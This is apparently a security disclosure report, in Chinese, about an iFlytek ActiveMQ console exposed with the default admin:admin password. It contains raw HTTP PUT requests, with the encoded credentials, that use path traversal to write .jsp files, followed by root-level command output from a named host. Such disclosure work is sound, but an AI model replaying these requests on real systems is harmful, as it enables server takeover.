科大讯飞ActiveMQ管理弱口令可导致命令执行

简要描述:

科大讯飞ActiveMQ管理弱口令可导致命令执行
http://zone.wooyun.org/content/26827

详细说明:

#1 漏洞网站, ActiveMQ对外开放

http://117.121.50.210:8161/admin/

http://ai.iflytek.com:8161/admin/

#2 弱口令

管理控制台的密码是 admin:admin

#3 对应系统

访问,http://117.121.50.210 跳转到 www.xfyun.cn

#4 ActiveMQ 提供了一个fileserver功能,支持RESTful file access

具体的利用细节,参考:http://zone.wooyun.org/content/26827

漏洞证明:

code 区域
<code>nc 117.121.50.210 8161
PUT /fileserver/shell.txt HTTP/1.0
Content-Length: 27
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

this is shell</code>

xf.png

code 区域
<code>PUT /fileserver/%2F%2F2%083.jsp HTTP/1.0
Content-Length: 27
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123</code>

路径:/fileserver/3.jsp

code 区域
<code>PUT /fileserver/a../%08/...%08/.%08/%08admin/3.jsp HTTP/1.0
Content-Length: 27
Host: 117.121.50.210:8161
Connection: Close
Authorization: Basic YWRtaW46YWRtaW4=

123123123123123123123123123</code>

路径:/fileserver/a../../admin/3.jsp

# 这里要用其它方法拿shell 或者 CVE-2016-3088

$ pwd

/usr/local/activemq/activemq/webapps/fileserver/

$ whoami

root

$ hostname

bj-web

修复方案:

# 禁止对外网开放